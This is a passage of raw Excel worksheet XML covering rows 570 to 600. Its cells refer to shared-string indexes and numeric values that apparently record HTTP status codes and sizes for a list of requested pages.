      <c r="C570" s="11" t="s">
        <v>1269</v>
      </c>
      <c r="D570" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E570" s="14" t="s">
        <v>1282</v>
      </c>
      <c r="F570" s="6">
        <v>1</v>
      </c>
      <c r="G570" s="6">
        <v>503</v>
      </c>
      <c r="H570" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I570" s="6">
        <v>444</v>
      </c>
      <c r="J570" s="6">
        <v>388</v>
      </c>
      <c r="K570" s="6">
        <v>0</v>
      </c>
      <c r="L570" s="6">
        <v>399</v>
      </c>
      <c r="M570" s="6">
        <v>35</v>
      </c>
      <c r="N570" s="11"/>
      <c r="O570" s="11"/>
      <c r="P570" s="11" t="s">
        <v>1283</v>
      </c>
    </row>
    <row r="571" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A571" s="3">
        <v>569</v>
      </c>
      <c r="B571" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C571" s="11" t="s">
        <v>1269</v>
      </c>
      <c r="D571" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E571" s="14" t="s">
        <v>1284</v>
      </c>
      <c r="F571" s="6">
        <v>1</v>
      </c>
      <c r="G571" s="6">
        <v>503</v>
      </c>
      <c r="H571" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I571" s="6">
        <v>443</v>
      </c>
      <c r="J571" s="6">
        <v>390</v>
      </c>
      <c r="K571" s="6">
        <v>0</v>
      </c>
      <c r="L571" s="6">
        <v>399</v>
      </c>
      <c r="M571" s="6">
        <v>35</v>
      </c>
      <c r="N571" s="11"/>
      <c r="O571" s="11"/>
      <c r="P571" s="11" t="s">
        <v>1285</v>
      </c>
    </row>
    <row r="572" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A572" s="3">
        <v>570</v>
      </c>
      <c r="B572" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C572" s="11" t="s">
        <v>1269</v>
      </c>
      <c r="D572" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E572" s="14" t="s">
        <v>1286</v>
      </c>
      <c r="F572" s="6">
        <v>1</v>
      </c>
      <c r="G572" s="6">
        <v>503</v>
      </c>
      <c r="H572" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I572" s="6">
        <v>430</v>
      </c>
      <c r="J572" s="6">
        <v>392</v>
      </c>
      <c r="K572" s="6">
        <v>0</v>
      </c>
      <c r="L572" s="6">
        <v>399</v>
      </c>
      <c r="M572" s="6">
        <v>35</v>
      </c>
      <c r="N572" s="11"/>
      <c r="O572" s="11"/>
      <c r="P572" s="11" t="s">
        <v>1287</v>
      </c>
    </row>
    <row r="573" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A573" s="3">
        <v>571</v>
      </c>
      <c r="B573" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C573" s="11" t="s">
        <v>1269</v>
      </c>
      <c r="D573" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E573" s="14" t="s">
        <v>1288</v>
      </c>
      <c r="F573" s="6">
        <v>1</v>
      </c>
      <c r="G573" s="6">
        <v>503</v>
      </c>
      <c r="H573" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I573" s="6">
        <v>422</v>
      </c>
      <c r="J573" s="6">
        <v>394</v>
      </c>
      <c r="K573" s="6">
        <v>0</v>
      </c>
      <c r="L573" s="6">
        <v>399</v>
      </c>
      <c r="M573" s="6">
        <v>35</v>
      </c>
      <c r="N573" s="11"/>
      <c r="O573" s="11"/>
      <c r="P573" s="11" t="s">
        <v>1289</v>
      </c>
    </row>
    <row r="574" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A574" s="3">
        <v>572</v>
      </c>
      <c r="B574" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C574" s="11" t="s">
        <v>1269</v>
      </c>
      <c r="D574" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E574" s="14" t="s">
        <v>1290</v>
      </c>
      <c r="F574" s="6">
        <v>1</v>
      </c>
      <c r="G574" s="6">
        <v>503</v>
      </c>
      <c r="H574" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I574" s="6">
        <v>430</v>
      </c>
      <c r="J574" s="6">
        <v>397</v>
      </c>
      <c r="K574" s="6">
        <v>0</v>
      </c>
      <c r="L574" s="6">
        <v>399</v>
      </c>
      <c r="M574" s="6">
        <v>35</v>
      </c>
      <c r="N574" s="11"/>
      <c r="O574" s="11"/>
      <c r="P574" s="11" t="s">
        <v>1291</v>
      </c>
    </row>
    <row r="575" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A575" s="3">
        <v>573</v>
      </c>
      <c r="B575" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C575" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D575" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E575" s="14" t="s">
        <v>1293</v>
      </c>
      <c r="F575" s="6">
        <v>1</v>
      </c>
      <c r="G575" s="6">
        <v>503</v>
      </c>
      <c r="H575" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I575" s="6">
        <v>444</v>
      </c>
      <c r="J575" s="6">
        <v>400</v>
      </c>
      <c r="K575" s="6">
        <v>0</v>
      </c>
      <c r="L575" s="6">
        <v>399</v>
      </c>
      <c r="M575" s="6">
        <v>35</v>
      </c>
      <c r="N575" s="11"/>
      <c r="O575" s="11"/>
      <c r="P575" s="11" t="s">
        <v>1294</v>
      </c>
    </row>
    <row r="576" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A576" s="3">
        <v>574</v>
      </c>
      <c r="B576" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C576" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D576" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E576" s="14" t="s">
        <v>1295</v>
      </c>
      <c r="F576" s="6">
        <v>1</v>
      </c>
      <c r="G576" s="6">
        <v>503</v>
      </c>
      <c r="H576" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I576" s="6">
        <v>448</v>
      </c>
      <c r="J576" s="6">
        <v>403</v>
      </c>
      <c r="K576" s="6">
        <v>0</v>
      </c>
      <c r="L576" s="6">
        <v>399</v>
      </c>
      <c r="M576" s="6">
        <v>35</v>
      </c>
      <c r="N576" s="11"/>
      <c r="O576" s="11"/>
      <c r="P576" s="11" t="s">
        <v>1296</v>
      </c>
    </row>
    <row r="577" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A577" s="3">
        <v>575</v>
      </c>
      <c r="B577" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C577" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D577" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E577" s="14" t="s">
        <v>1297</v>
      </c>
      <c r="F577" s="6">
        <v>1</v>
      </c>
      <c r="G577" s="6">
        <v>503</v>
      </c>
      <c r="H577" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I577" s="6">
        <v>452</v>
      </c>
      <c r="J577" s="6">
        <v>406</v>
      </c>
      <c r="K577" s="6">
        <v>0</v>
      </c>
      <c r="L577" s="6">
        <v>399</v>
      </c>
      <c r="M577" s="6">
        <v>35</v>
      </c>
      <c r="N577" s="11"/>
      <c r="O577" s="11"/>
      <c r="P577" s="11" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="578" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A578" s="3">
        <v>576</v>
      </c>
      <c r="B578" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C578" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D578" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E578" s="14" t="s">
        <v>1299</v>
      </c>
      <c r="F578" s="6">
        <v>1</v>
      </c>
      <c r="G578" s="6">
        <v>503</v>
      </c>
      <c r="H578" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I578" s="6">
        <v>454</v>
      </c>
      <c r="J578" s="6">
        <v>409</v>
      </c>
      <c r="K578" s="6">
        <v>0</v>
      </c>
      <c r="L578" s="6">
        <v>399</v>
      </c>
      <c r="M578" s="6">
        <v>35</v>
      </c>
      <c r="N578" s="11"/>
      <c r="O578" s="11"/>
      <c r="P578" s="11" t="s">
        <v>1300</v>
      </c>
    </row>
    <row r="579" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A579" s="3">
        <v>577</v>
      </c>
      <c r="B579" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C579" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D579" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E579" s="14" t="s">
        <v>1301</v>
      </c>
      <c r="F579" s="6">
        <v>1</v>
      </c>
      <c r="G579" s="6">
        <v>503</v>
      </c>
      <c r="H579" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I579" s="6">
        <v>452</v>
      </c>
      <c r="J579" s="6">
        <v>412</v>
      </c>
      <c r="K579" s="6">
        <v>0</v>
      </c>
      <c r="L579" s="6">
        <v>399</v>
      </c>
      <c r="M579" s="6">
        <v>35</v>
      </c>
      <c r="N579" s="11"/>
      <c r="O579" s="11"/>
      <c r="P579" s="11" t="s">
        <v>1302</v>
      </c>
    </row>
    <row r="580" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A580" s="3">
        <v>578</v>
      </c>
      <c r="B580" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C580" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D580" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E580" s="14" t="s">
        <v>1303</v>
      </c>
      <c r="F580" s="6">
        <v>1</v>
      </c>
      <c r="G580" s="6">
        <v>503</v>
      </c>
      <c r="H580" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I580" s="6">
        <v>445</v>
      </c>
      <c r="J580" s="6">
        <v>415</v>
      </c>
      <c r="K580" s="6">
        <v>0</v>
      </c>
      <c r="L580" s="6">
        <v>399</v>
      </c>
      <c r="M580" s="6">
        <v>35</v>
      </c>
      <c r="N580" s="11"/>
      <c r="O580" s="11"/>
      <c r="P580" s="11" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="581" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A581" s="3">
        <v>579</v>
      </c>
      <c r="B581" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C581" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D581" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E581" s="14" t="s">
        <v>1305</v>
      </c>
      <c r="F581" s="6">
        <v>1</v>
      </c>
      <c r="G581" s="6">
        <v>503</v>
      </c>
      <c r="H581" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I581" s="6">
        <v>422</v>
      </c>
      <c r="J581" s="6">
        <v>418</v>
      </c>
      <c r="K581" s="6">
        <v>0</v>
      </c>
      <c r="L581" s="6">
        <v>399</v>
      </c>
      <c r="M581" s="6">
        <v>35</v>
      </c>
      <c r="N581" s="11"/>
      <c r="O581" s="11"/>
      <c r="P581" s="11" t="s">
        <v>1306</v>
      </c>
    </row>
    <row r="582" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A582" s="3">
        <v>580</v>
      </c>
      <c r="B582" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C582" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D582" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E582" s="14" t="s">
        <v>1307</v>
      </c>
      <c r="F582" s="6">
        <v>1</v>
      </c>
      <c r="G582" s="6">
        <v>503</v>
      </c>
      <c r="H582" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I582" s="6">
        <v>428</v>
      </c>
      <c r="J582" s="6">
        <v>421</v>
      </c>
      <c r="K582" s="6">
        <v>0</v>
      </c>
      <c r="L582" s="6">
        <v>399</v>
      </c>
      <c r="M582" s="6">
        <v>35</v>
      </c>
      <c r="N582" s="11"/>
      <c r="O582" s="11"/>
      <c r="P582" s="11" t="s">
        <v>1308</v>
      </c>
    </row>
    <row r="583" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A583" s="3">
        <v>581</v>
      </c>
      <c r="B583" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C583" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D583" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E583" s="14" t="s">
        <v>1309</v>
      </c>
      <c r="F583" s="6">
        <v>1</v>
      </c>
      <c r="G583" s="6">
        <v>503</v>
      </c>
      <c r="H583" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I583" s="6">
        <v>419</v>
      </c>
      <c r="J583" s="6">
        <v>424</v>
      </c>
      <c r="K583" s="6">
        <v>0</v>
      </c>
      <c r="L583" s="6">
        <v>399</v>
      </c>
      <c r="M583" s="6">
        <v>35</v>
      </c>
      <c r="N583" s="11"/>
      <c r="O583" s="11"/>
      <c r="P583" s="11" t="s">
        <v>1310</v>
      </c>
    </row>
    <row r="584" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A584" s="3">
        <v>582</v>
      </c>
      <c r="B584" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C584" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D584" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E584" s="14" t="s">
        <v>1311</v>
      </c>
      <c r="F584" s="6">
        <v>1</v>
      </c>
      <c r="G584" s="6">
        <v>503</v>
      </c>
      <c r="H584" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I584" s="6">
        <v>539</v>
      </c>
      <c r="J584" s="6">
        <v>427</v>
      </c>
      <c r="K584" s="6">
        <v>0</v>
      </c>
      <c r="L584" s="6">
        <v>399</v>
      </c>
      <c r="M584" s="6">
        <v>35</v>
      </c>
      <c r="N584" s="11"/>
      <c r="O584" s="11"/>
      <c r="P584" s="11" t="s">
        <v>1312</v>
      </c>
    </row>
    <row r="585" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A585" s="3">
        <v>583</v>
      </c>
      <c r="B585" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C585" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D585" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E585" s="14" t="s">
        <v>1313</v>
      </c>
      <c r="F585" s="6">
        <v>1</v>
      </c>
      <c r="G585" s="6">
        <v>503</v>
      </c>
      <c r="H585" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I585" s="6">
        <v>580</v>
      </c>
      <c r="J585" s="6">
        <v>430</v>
      </c>
      <c r="K585" s="6">
        <v>0</v>
      </c>
      <c r="L585" s="6">
        <v>399</v>
      </c>
      <c r="M585" s="6">
        <v>35</v>
      </c>
      <c r="N585" s="11"/>
      <c r="O585" s="11"/>
      <c r="P585" s="11" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="586" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A586" s="3">
        <v>584</v>
      </c>
      <c r="B586" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C586" s="11" t="s">
        <v>1292</v>
      </c>
      <c r="D586" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E586" s="14" t="s">
        <v>1315</v>
      </c>
      <c r="F586" s="6">
        <v>1</v>
      </c>
      <c r="G586" s="6">
        <v>503</v>
      </c>
      <c r="H586" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I586" s="6">
        <v>605</v>
      </c>
      <c r="J586" s="6">
        <v>433</v>
      </c>
      <c r="K586" s="6">
        <v>0</v>
      </c>
      <c r="L586" s="6">
        <v>399</v>
      </c>
      <c r="M586" s="6">
        <v>35</v>
      </c>
      <c r="N586" s="11"/>
      <c r="O586" s="11"/>
      <c r="P586" s="11" t="s">
        <v>1316</v>
      </c>
    </row>
    <row r="587" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A587" s="3">
        <v>585</v>
      </c>
      <c r="B587" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C587" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D587" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E587" s="14" t="s">
        <v>1318</v>
      </c>
      <c r="F587" s="6">
        <v>1</v>
      </c>
      <c r="G587" s="6">
        <v>503</v>
      </c>
      <c r="H587" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I587" s="6">
        <v>596</v>
      </c>
      <c r="J587" s="6">
        <v>436</v>
      </c>
      <c r="K587" s="6">
        <v>0</v>
      </c>
      <c r="L587" s="6">
        <v>399</v>
      </c>
      <c r="M587" s="6">
        <v>35</v>
      </c>
      <c r="N587" s="11"/>
      <c r="O587" s="11"/>
      <c r="P587" s="11" t="s">
        <v>1319</v>
      </c>
    </row>
    <row r="588" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A588" s="3">
        <v>586</v>
      </c>
      <c r="B588" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C588" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D588" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E588" s="14" t="s">
        <v>1320</v>
      </c>
      <c r="F588" s="6">
        <v>1</v>
      </c>
      <c r="G588" s="6">
        <v>503</v>
      </c>
      <c r="H588" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I588" s="6">
        <v>605</v>
      </c>
      <c r="J588" s="6">
        <v>439</v>
      </c>
      <c r="K588" s="6">
        <v>0</v>
      </c>
      <c r="L588" s="6">
        <v>399</v>
      </c>
      <c r="M588" s="6">
        <v>35</v>
      </c>
      <c r="N588" s="11"/>
      <c r="O588" s="11"/>
      <c r="P588" s="11" t="s">
        <v>1321</v>
      </c>
    </row>
    <row r="589" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A589" s="3">
        <v>587</v>
      </c>
      <c r="B589" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C589" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D589" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E589" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="F589" s="6">
        <v>1</v>
      </c>
      <c r="G589" s="6">
        <v>503</v>
      </c>
      <c r="H589" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I589" s="6">
        <v>474</v>
      </c>
      <c r="J589" s="6">
        <v>442</v>
      </c>
      <c r="K589" s="6">
        <v>0</v>
      </c>
      <c r="L589" s="6">
        <v>399</v>
      </c>
      <c r="M589" s="6">
        <v>35</v>
      </c>
      <c r="N589" s="11"/>
      <c r="O589" s="11"/>
      <c r="P589" s="11" t="s">
        <v>1323</v>
      </c>
    </row>
    <row r="590" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A590" s="3">
        <v>588</v>
      </c>
      <c r="B590" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C590" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D590" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E590" s="14" t="s">
        <v>1324</v>
      </c>
      <c r="F590" s="6">
        <v>1</v>
      </c>
      <c r="G590" s="6">
        <v>503</v>
      </c>
      <c r="H590" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I590" s="6">
        <v>415</v>
      </c>
      <c r="J590" s="6">
        <v>445</v>
      </c>
      <c r="K590" s="6">
        <v>0</v>
      </c>
      <c r="L590" s="6">
        <v>399</v>
      </c>
      <c r="M590" s="6">
        <v>35</v>
      </c>
      <c r="N590" s="11"/>
      <c r="O590" s="11"/>
      <c r="P590" s="11" t="s">
        <v>1325</v>
      </c>
    </row>
    <row r="591" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A591" s="3">
        <v>589</v>
      </c>
      <c r="B591" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C591" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D591" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E591" s="14" t="s">
        <v>1326</v>
      </c>
      <c r="F591" s="6">
        <v>1</v>
      </c>
      <c r="G591" s="6">
        <v>503</v>
      </c>
      <c r="H591" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I591" s="6">
        <v>404</v>
      </c>
      <c r="J591" s="6">
        <v>448</v>
      </c>
      <c r="K591" s="6">
        <v>0</v>
      </c>
      <c r="L591" s="6">
        <v>399</v>
      </c>
      <c r="M591" s="6">
        <v>35</v>
      </c>
      <c r="N591" s="11"/>
      <c r="O591" s="11"/>
      <c r="P591" s="11" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="592" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A592" s="3">
        <v>590</v>
      </c>
      <c r="B592" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C592" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D592" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E592" s="14" t="s">
        <v>1328</v>
      </c>
      <c r="F592" s="6">
        <v>1</v>
      </c>
      <c r="G592" s="6">
        <v>503</v>
      </c>
      <c r="H592" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I592" s="6">
        <v>405</v>
      </c>
      <c r="J592" s="6">
        <v>451</v>
      </c>
      <c r="K592" s="6">
        <v>0</v>
      </c>
      <c r="L592" s="6">
        <v>399</v>
      </c>
      <c r="M592" s="6">
        <v>35</v>
      </c>
      <c r="N592" s="11"/>
      <c r="O592" s="11"/>
      <c r="P592" s="11" t="s">
        <v>1329</v>
      </c>
    </row>
    <row r="593" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A593" s="3">
        <v>591</v>
      </c>
      <c r="B593" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C593" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D593" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E593" s="14" t="s">
        <v>1330</v>
      </c>
      <c r="F593" s="6">
        <v>1</v>
      </c>
      <c r="G593" s="6">
        <v>503</v>
      </c>
      <c r="H593" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I593" s="6">
        <v>403</v>
      </c>
      <c r="J593" s="6">
        <v>454</v>
      </c>
      <c r="K593" s="6">
        <v>0</v>
      </c>
      <c r="L593" s="6">
        <v>399</v>
      </c>
      <c r="M593" s="6">
        <v>35</v>
      </c>
      <c r="N593" s="11"/>
      <c r="O593" s="11"/>
      <c r="P593" s="11" t="s">
        <v>1331</v>
      </c>
    </row>
    <row r="594" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A594" s="3">
        <v>592</v>
      </c>
      <c r="B594" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C594" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D594" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E594" s="14" t="s">
        <v>1332</v>
      </c>
      <c r="F594" s="6">
        <v>1</v>
      </c>
      <c r="G594" s="6">
        <v>503</v>
      </c>
      <c r="H594" s="11" t="s">
        <v>53</v>
      </c>
      <c r="I594" s="6">
        <v>428</v>
      </c>
      <c r="J594" s="6">
        <v>457</v>
      </c>
      <c r="K594" s="6">
        <v>0</v>
      </c>
      <c r="L594" s="6">
        <v>399</v>
      </c>
      <c r="M594" s="6">
        <v>35</v>
      </c>
      <c r="N594" s="11"/>
      <c r="O594" s="11"/>
      <c r="P594" s="11" t="s">
        <v>1333</v>
      </c>
    </row>
    <row r="595" spans="1:16" ht="15.75" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A595" s="3">
        <v>593</v>
      </c>
      <c r="B595" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C595" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D595" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E595" s="14" t="s">
        <v>1334</v>
      </c>
      <c r="F595" s="6">
        <v>2</v>
      </c>
      <c r="G595" s="6">
        <v>200</v>
      </c>
      <c r="H595" s="11" t="s">
        <v>20</v>
      </c>
      <c r="I595" s="6">
        <v>412</v>
      </c>
      <c r="J595" s="6">
        <v>525</v>
      </c>
      <c r="K595" s="6">
        <v>0</v>
      </c>
      <c r="L595" s="6">
        <v>347</v>
      </c>
      <c r="M595" s="6">
        <v>69691</v>
      </c>
      <c r="N595" s="11"/>
      <c r="O595" s="11" t="s">
        <v>25</v>
      </c>
      <c r="P595" s="11" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="596" spans="1:16" ht="15.75" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A596" s="3">
        <v>594</v>
      </c>
      <c r="B596" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C596" s="11" t="s">
        <v>1317</v>
      </c>
      <c r="D596" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E596" s="14" t="s">
        <v>1336</v>
      </c>
      <c r="F596" s="6">
        <v>2</v>
      </c>
      <c r="G596" s="6">
        <v>200</v>
      </c>
      <c r="H596" s="11" t="s">
        <v>20</v>
      </c>
      <c r="I596" s="6">
        <v>416</v>
      </c>
      <c r="J596" s="6">
        <v>530</v>
      </c>
      <c r="K596" s="6">
        <v>0</v>
      </c>
      <c r="L596" s="6">
        <v>347</v>
      </c>
      <c r="M596" s="6">
        <v>69696</v>
      </c>
      <c r="N596" s="11"/>
      <c r="O596" s="11" t="s">
        <v>25</v>
      </c>
      <c r="P596" s="11" t="s">
        <v>1337</v>
      </c>
    </row>
    <row r="597" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A597" s="3">
        <v>595</v>
      </c>
      <c r="B597" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C597" s="11" t="s">
        <v>1338</v>
      </c>
      <c r="D597" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E597" s="14" t="s">
        <v>1339</v>
      </c>
      <c r="F597" s="6">
        <v>1</v>
      </c>
      <c r="G597" s="6">
        <v>404</v>
      </c>
      <c r="H597" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I597" s="12" t="s">
        <v>446</v>
      </c>
      <c r="J597" s="6">
        <v>400</v>
      </c>
      <c r="K597" s="6">
        <v>0</v>
      </c>
      <c r="L597" s="6">
        <v>331</v>
      </c>
      <c r="M597" s="6">
        <v>69134</v>
      </c>
      <c r="N597" s="11"/>
      <c r="O597" s="11"/>
      <c r="P597" s="11" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="598" spans="1:16" ht="15.75" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A598" s="3">
        <v>596</v>
      </c>
      <c r="B598" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C598" s="11" t="s">
        <v>1338</v>
      </c>
      <c r="D598" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E598" s="14" t="s">
        <v>1341</v>
      </c>
      <c r="F598" s="6">
        <v>2</v>
      </c>
      <c r="G598" s="6">
        <v>200</v>
      </c>
      <c r="H598" s="11" t="s">
        <v>20</v>
      </c>
      <c r="I598" s="12" t="s">
        <v>446</v>
      </c>
      <c r="J598" s="6">
        <v>401</v>
      </c>
      <c r="K598" s="6">
        <v>0</v>
      </c>
      <c r="L598" s="6">
        <v>347</v>
      </c>
      <c r="M598" s="6">
        <v>78608</v>
      </c>
      <c r="N598" s="11"/>
      <c r="O598" s="11" t="s">
        <v>25</v>
      </c>
      <c r="P598" s="11" t="s">
        <v>1342</v>
      </c>
    </row>
    <row r="599" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A599" s="3">
        <v>597</v>
      </c>
      <c r="B599" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C599" s="11" t="s">
        <v>1338</v>
      </c>
      <c r="D599" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E599" s="14" t="s">
        <v>1343</v>
      </c>
      <c r="F599" s="6">
        <v>1</v>
      </c>
      <c r="G599" s="6">
        <v>404</v>
      </c>
      <c r="H599" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I599" s="12" t="s">
        <v>446</v>
      </c>
      <c r="J599" s="6">
        <v>344</v>
      </c>
      <c r="K599" s="6">
        <v>0</v>
      </c>
      <c r="L599" s="6">
        <v>331</v>
      </c>
      <c r="M599" s="6">
        <v>69134</v>
      </c>
      <c r="N599" s="11"/>
      <c r="O599" s="11"/>
      <c r="P599" s="11" t="s">
        <v>1344</v>
      </c>
    </row>
    <row r="600" spans="1:16" ht="15.75" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A600" s="3">
        <v>598</v>
      </c>
      <c r="B600" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C600" s="11" t="s">
        <v>1345</v>
      </c>
      <c r="D600" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E600" s="14" t="s">
        <v>1346</v>
      </c>
      <c r="F600" s="6">
        <v>2</v>
      </c>
      <c r="G600" s="6">
        <v>200</v>
      </c>
      <c r="H600" s="11" t="s">
        <v>20</v>
      </c>
      <c r="I600" s="12" t="s">
        <v>446</v>
      </c>
      <c r="J600" s="6">
        <v>363</v>
      </c>
      <c r="K600" s="6">
        <v>0</v>
      </c>
      <c r="L600" s="6">
        <v>347</v>
      </c>
      <c r="M600" s="6">
        <v>78576</v>
      </c>
      <c r="N600" s="11"/>
      <c r="O600" s="11" t="s">
        <v>25</v>
      </c>
      <c r="P600" s="11" t="s">
